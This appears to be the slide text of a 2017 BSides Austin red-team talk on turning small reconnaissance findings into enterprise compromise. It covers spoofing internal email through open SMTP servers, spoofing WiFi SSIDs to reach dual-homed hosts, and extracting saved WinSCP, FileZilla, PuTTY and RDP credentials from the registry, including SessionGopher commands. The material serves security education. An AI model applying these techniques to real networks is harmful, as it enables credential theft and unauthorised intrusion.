Breadcrumbs to Loaves: How tidbits of Information Lead Us to Full-Scale Compromise. Presented at BSides Austin 2017. Follow on Twitter: @arvanaghi
Often on red teams, there is no obvious path to compromising the environment. Reconnaissance efforts, both external and internal, may yield only crumbs of information. Though tiny and often in obscure locations, these bits of information can serve as a trail of breadcrumbs to full-scale compromise. Specific keys in the Windows Registry and unusual sources of open-source intelligence gathering can provide valuable information about a network mapping that most companies don’t know exist. We walk you step-by-step through what some of these crumbs are, how to find them, and how we have used tiny bits of information to escalate our privileges to full-scale enterprise compromise.
11. Crumb #3: Unauthenticated SMTP Server
• If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that
server to internal employees
• Without authentication, you can spoof any internal email address!
http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-
commands-via-gmail
https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records
The receiving mail server automatically checks the SPF record for the domain, if they exist.
Social engineering opportunities arise from seeing third-party relationships all from a DNS record!
SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
Primary target for attacking a large organization: small, lesser-known subsidiaries.
Command-line syntax:
HELO <domain> prepares the SMTP server for use
MAIL FROM <email address> Mail sender
RCPT TO <email address> Mail recipient
DATA Message headers from, to, subject, and content.
Image source: http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
EyeWitness by Christopher Truncer: https://github.com/ChrisTruncer/EyeWitness
EyeWitness automatically screenshots all HTTP/HTTPs ports discovered from Nmap for you, and makes an attempt at classifying the kind of site it is. When EyeWitness recognizes a credentialed page, it will provide you default credentials typically used for that service.
Photo taken from https://www.christophertruncer.com/eyewitness-triage-tool/
Wired-in network on the left with Ethernet. These hosts should, in theory, not be visible to any system not physically connected to their network. Security guards at the door, physical access controls, monitoring all wall ports, etc.
On one of our engagements, we saw the physically-connected computers were still probing for remembered SSIDs because they had their WiFi turned on. Most people do not turn off their WiFi even when they are wired in, which can make them visible to the outside world!
We spoofed the “gogoinflight” SSID and established an association between our TP-Link access point and the system. Now, we could see the system on our own spoofed subnet, see what services it was running, and tools against it.
By running Responder or a social engineering campaign, we could use PsExec or WMIExec to exploit that system from our new subnet. Once we’ve gained access to that system, we could pivot to the wired internal network, since it is dual-homed!
Essentially, we get access to the same wired-in benefits as any system physically connected. Despite this company not having any remote portal access or VPN, this physical security measure failed due to keeping WiFi enabled.
System Preferences Network Advanced
Used to be such that a more “preferred” association would make you drop your current association! E.g. if you are connected to CompanyWiFi, but had gogoinflight as a more preferred network and a gogoinflight SSID appeared, your system would automatically switch!
https://github.com/fireeye/SessionGopher
SID structure: S-1-5-21-Domain-User
Query all these for domain users who have logged on!
The Registry has both volatile and static data. As an example, HKEY_LOCAL_MACHINE\HARDWARE fills its subkeys at boot time after analyzing the hardware under the Windows system.
HKEY_USERS has persistent information about domain users who have logged onto a system. HKEY_CURRENT_USER is actually a symlink to the HKEY_USERS subkey of the currently logged in user!
Persistent artifacts from all these tools can help get a network mapping not just for Unix systems, but also jump boxes. Jump boxes can be difficult to find, but when extracting all saved RDP sessions from each host, you can see to where these servers RDP. Once you find a saved RDP session with a hostname you know to be a segmented environment, you know which server can communicate with that host!
The saved password string above for WinSCP sessions is not encrypted by default. That is obfuscation, and it is easily reversible. The “key” is the session hostname + username.
The password will only be encrypted when the “UseMastrPassword” value in the second registry subkey is set to 1. If this is set, then you can only extract the encrypted password, and attempt to bruteforce it.
As seen here, WinSCP’s password obfuscation algorithm uses a sequence of bitwise operation that is xor’d with a magic value. The password obfuscation algorithm has been reverse engineered across several languages, but never before in PowerShell.
SessionGopher’s built-in WinSCP deobfuscator
HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default contains most recent RDP attempts
FileZilla stores its password in an XML file, not in the registry. By default, the saved password is only base-64 encoded, and not encrypted.
SuperPuTTY is used to manage simultaneous PuTTY sessions, and has the added benefit of storing passwords for one-click SSH sessions. PuTTY does not store passwords, so many clients use SuperPuTTY as a wrapper.
SuperPuTTY sessions are saved in a Sessions.xml file, and not in the registry. The password gets placed in the “ExtraArgs” argument, which can contain a multitude of additiona arguments. SuperPuTTY interprets anything following ”-pw” as the password argument for the SSH session.
Stored sessions as .rdp files can be used for one-click logins. These files are executable and can also be dragged into a text editor like Sublime Text and read.
SessionGopher synthesizes the .ppk and .rdp files and makes sense of them. It return the private key, private MAC, and whether or not the key is encrypted.
Invoke-WmiMethod allows you to use WMI to read the remote registry of a different system using the –Class ‘StdRegProv’. From your own attack computer connected to the network, you can read the persistent registry artifacts of HKEY_USERS for each box using WMI. Quiet, quick, and effective!
Invoke-SessionGopher –iL inputlist.txt
Invoke-SessionGopher –AllDomain
Invoke-SessionGopher –Target winbox.company.com
After running SessionGopher across a domain or set of computers, you will essentially have a network mapping of the entire corporate infrastructure! Jump boxes, Unix systems, and other non-domain hosts should all be revealed to you along with the path to get there.